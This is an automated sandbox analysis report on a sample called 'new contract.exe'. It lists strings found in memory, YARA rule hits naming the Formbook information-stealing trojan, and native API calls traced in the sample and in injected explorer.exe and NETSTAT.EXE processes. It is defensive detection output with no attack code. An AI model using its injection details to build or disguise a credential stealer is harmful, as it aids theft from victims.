Source: explorer.exe, 00000003.00000002.4141038919.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1762772794.000000000C893000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000003.00000003.3484154679.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108475652.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000003.00000003.3484154679.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108475652.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000003.00000000.1752045440.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.00000000097D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000003.00000000.1752045440.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.00000000097D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000003.00000000.1743468048.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1744290511.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4129060379.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130757516.0000000003700000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000003.00000000.1752045440.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.0000000009701000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1752045440.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.00000000097D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000003.00000000.1752045440.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.0000000009701000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg

E-Banking Fraud

Source: Yara match File source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.4142928612.000000000E4FB000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: new contract.exe PID: 7424, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: new contract.exe PID: 7648, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: NETSTAT.EXE PID: 7732, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041A320 NtCreateFile, 2_2_0041A320
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041A3D0 NtReadFile, 2_2_0041A3D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041A450 NtClose, 2_2_0041A450
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041A500 NtAllocateVirtualMemory, 2_2_0041A500
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041A2DA NtCreateFile, 2_2_0041A2DA
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041A44A NtClose, 2_2_0041A44A
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662B60 NtClose,LdrInitializeThunk, 2_2_01662B60
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_01662BF0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662AD0 NtReadFile,LdrInitializeThunk, 2_2_01662AD0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662D30 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_01662D30
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662D10 NtMapViewOfSection,LdrInitializeThunk, 2_2_01662D10
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662DF0 NtQuerySystemInformation,LdrInitializeThunk, 2_2_01662DF0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662DD0 NtDelayExecution,LdrInitializeThunk, 2_2_01662DD0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662C70 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_01662C70
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662CA0 NtQueryInformationToken,LdrInitializeThunk, 2_2_01662CA0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662F30 NtCreateSection,LdrInitializeThunk, 2_2_01662F30
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662FE0 NtCreateFile,LdrInitializeThunk, 2_2_01662FE0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662FB0 NtResumeThread,LdrInitializeThunk, 2_2_01662FB0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662F90 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_01662F90
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_01662EA0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662E80 NtReadVirtualMemory,LdrInitializeThunk, 2_2_01662E80
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01664340 NtSetContextThread, 2_2_01664340
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01664650 NtSuspendThread, 2_2_01664650
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662BE0 NtQueryValueKey, 2_2_01662BE0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662BA0 NtEnumerateValueKey, 2_2_01662BA0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662B80 NtQueryInformationFile, 2_2_01662B80
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662AF0 NtWriteFile, 2_2_01662AF0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662AB0 NtWaitForSingleObject, 2_2_01662AB0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662D00 NtSetInformationFile, 2_2_01662D00
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662DB0 NtEnumerateKey, 2_2_01662DB0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662C60 NtCreateKey, 2_2_01662C60
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662C00 NtQueryInformationProcess, 2_2_01662C00
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662CF0 NtOpenProcess, 2_2_01662CF0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662CC0 NtQueryVirtualMemory, 2_2_01662CC0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662F60 NtCreateProcessEx, 2_2_01662F60
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662FA0 NtQuerySection, 2_2_01662FA0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662E30 NtWriteVirtualMemory, 2_2_01662E30
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662EE0 NtQueueApcThread, 2_2_01662EE0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01663010 NtOpenDirectoryObject, 2_2_01663010
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01663090 NtSetValueKey, 2_2_01663090
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016635C0 NtCreateMutant, 2_2_016635C0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016639B0 NtGetContextThread, 2_2_016639B0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01663D70 NtOpenThread, 2_2_01663D70
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01663D10 NtOpenProcessToken, 2_2_01663D10
Source: C:\Windows\explorer.exe Code function: 3_2_0E4E4E12 NtProtectVirtualMemory, 3_2_0E4E4E12
Source: C:\Windows\explorer.exe Code function: 3_2_0E4E3232 NtCreateFile, 3_2_0E4E3232
Source: C:\Windows\explorer.exe Code function: 3_2_0E4E4E0A NtProtectVirtualMemory, 3_2_0E4E4E0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182B60 NtClose,LdrInitializeThunk, 5_2_03182B60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_03182BF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182BE0 NtQueryValueKey,LdrInitializeThunk, 5_2_03182BE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182AD0 NtReadFile,LdrInitializeThunk, 5_2_03182AD0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182F30 NtCreateSection,LdrInitializeThunk, 5_2_03182F30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182FE0 NtCreateFile,LdrInitializeThunk, 5_2_03182FE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_03182EA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182D10 NtMapViewOfSection,LdrInitializeThunk, 5_2_03182D10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182DD0 NtDelayExecution,LdrInitializeThunk, 5_2_03182DD0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182DF0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_03182DF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182C70 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_03182C70
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182C60 NtCreateKey,LdrInitializeThunk, 5_2_03182C60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182CA0 NtQueryInformationToken,LdrInitializeThunk, 5_2_03182CA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031835C0 NtCreateMutant,LdrInitializeThunk, 5_2_031835C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03184340 NtSetContextThread, 5_2_03184340
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03184650 NtSuspendThread, 5_2_03184650
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182B80 NtQueryInformationFile, 5_2_03182B80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182BA0 NtEnumerateValueKey, 5_2_03182BA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182AB0 NtWaitForSingleObject, 5_2_03182AB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182AF0 NtWriteFile, 5_2_03182AF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182F60 NtCreateProcessEx, 5_2_03182F60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182F90 NtProtectVirtualMemory, 5_2_03182F90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182FB0 NtResumeThread, 5_2_03182FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182FA0 NtQuerySection, 5_2_03182FA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182E30 NtWriteVirtualMemory, 5_2_03182E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182E80 NtReadVirtualMemory, 5_2_03182E80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182EE0 NtQueueApcThread, 5_2_03182EE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182D00 NtSetInformationFile, 5_2_03182D00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182D30 NtUnmapViewOfSection, 5_2_03182D30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182DB0 NtEnumerateKey, 5_2_03182DB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182C00 NtQueryInformationProcess, 5_2_03182C00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182CC0 NtQueryVirtualMemory, 5_2_03182CC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182CF0 NtOpenProcess, 5_2_03182CF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03183010 NtOpenDirectoryObject, 5_2_03183010
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03183090 NtSetValueKey, 5_2_03183090
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031839B0 NtGetContextThread, 5_2_031839B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03183D10 NtOpenProcessToken, 5_2_03183D10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03183D70 NtOpenThread, 5_2_03183D70
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052A320 NtCreateFile, 5_2_0052A320
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052A3D0 NtReadFile, 5_2_0052A3D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052A450 NtClose, 5_2_0052A450
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052A500 NtAllocateVirtualMemory, 5_2_0052A500
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052A2DA NtCreateFile, 5_2_0052A2DA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052A44A NtClose, 5_2_0052A44A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02DB9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 5_2_02DB9BAF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02DBA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread, 5_2_02DBA036
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02DB9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 5_2_02DB9BB2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02DBA042 NtQueryInformationProcess, 5_2_02DBA042
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E7571 2_2_016E7571
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F95C3 2_2_016F95C3
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CD5B0 2_2_016CD5B0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01621460 2_2_01621460
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016EF43F 2_2_016EF43F
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016EF7B0 2_2_016EF7B0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01675630 2_2_01675630
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E16CC 2_2_016E16CC
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01639950 2_2_01639950
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164B950 2_2_0164B950
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C5910 2_2_016C5910
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169D800 2_2_0169D800
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016338E0 2_2_016338E0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016EFB76 2_2_016EFB76
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A5BF0 2_2_016A5BF0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0166DBF9 2_2_0166DBF9
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164FB80 2_2_0164FB80
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A3A6C 2_2_016A3A6C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016EFA49 2_2_016EFA49
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E7A46 2_2_016E7A46
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016DDAC6 2_2_016DDAC6
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CDAAC 2_2_016CDAAC
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01675AA0 2_2_01675AA0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D1AA3 2_2_016D1AA3
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E7D73 2_2_016E7D73
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01633D40 2_2_01633D40
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E1D5A 2_2_016E1D5A
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164FDC0 2_2_0164FDC0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A9C32 2_2_016A9C32
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016EFCF2 2_2_016EFCF2
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016EFF09 2_2_016EFF09
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_015F3FD5 2_2_015F3FD5
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_015F3FD2 2_2_015F3FD2
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016EFFB1 2_2_016EFFB1
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01631F92 2_2_01631F92
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01639EB0 2_2_01639EB0
Source: C:\Windows\explorer.exe Code function: 3_2_0E4E3232 3_2_0E4E3232
Source: C:\Windows\explorer.exe Code function: 3_2_0E4E2036 3_2_0E4E2036
Source: C:\Windows\explorer.exe Code function: 3_2_0E4D9082 3_2_0E4D9082
Source: C:\Windows\explorer.exe Code function: 3_2_0E4DAD02 3_2_0E4DAD02
Source: C:\Windows\explorer.exe Code function: 3_2_0E4E0912 3_2_0E4E0912
Source: C:\Windows\explorer.exe Code function: 3_2_0E4DDB30 3_2_0E4DDB30
Source: C:\Windows\explorer.exe Code function: 3_2_0E4DDB32 3_2_0E4DDB32
Source: C:\Windows\explorer.exe Code function: 3_2_0E4E65CD 3_2_0E4E65CD
Source: C:\Windows\explorer.exe Code function: 3_2_0FB3CB32 3_2_0FB3CB32
Source: C:\Windows\explorer.exe Code function: 3_2_0FB3CB30 3_2_0FB3CB30
Source: C:\Windows\explorer.exe Code function: 3_2_0FB42232 3_2_0FB42232
Source: C:\Windows\explorer.exe Code function: 3_2_0FB455CD 3_2_0FB455CD
Source: C:\Windows\explorer.exe Code function: 3_2_0FB3F912 3_2_0FB3F912
Source: C:\Windows\explorer.exe Code function: 3_2_0FB39D02 3_2_0FB39D02
Source: C:\Windows\explorer.exe Code function: 3_2_0FB38082 3_2_0FB38082
Source: C:\Windows\explorer.exe Code function: 3_2_0FB41036 3_2_0FB41036
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00682167 5_2_00682167
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00681715 5_2_00681715
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320A352 5_2_0320A352
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032103E6 5_2_032103E6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0315E3F0 5_2_0315E3F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031F0274 5_2_031F0274
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031D02C0 5_2_031D02C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031EA118 5_2_031EA118
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03140100 5_2_03140100
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031D8158 5_2_031D8158
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032101AA 5_2_032101AA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032081CC 5_2_032081CC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031E2000 5_2_031E2000
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03174750 5_2_03174750
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03150770 5_2_03150770
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0314C7C0 5_2_0314C7C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0316C6E0 5_2_0316C6E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03150535 5_2_03150535
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03210591 5_2_03210591
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031F4420 5_2_031F4420
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03202446 5_2_03202446
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031FE4F6 5_2_031FE4F6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320AB40 5_2_0320AB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03206BD7 5_2_03206BD7
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0314EA80 5_2_0314EA80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03166962 5_2_03166962
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0321A9A6 5_2_0321A9A6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031529A0 5_2_031529A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03152840 5_2_03152840
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0315A840 5_2_0315A840
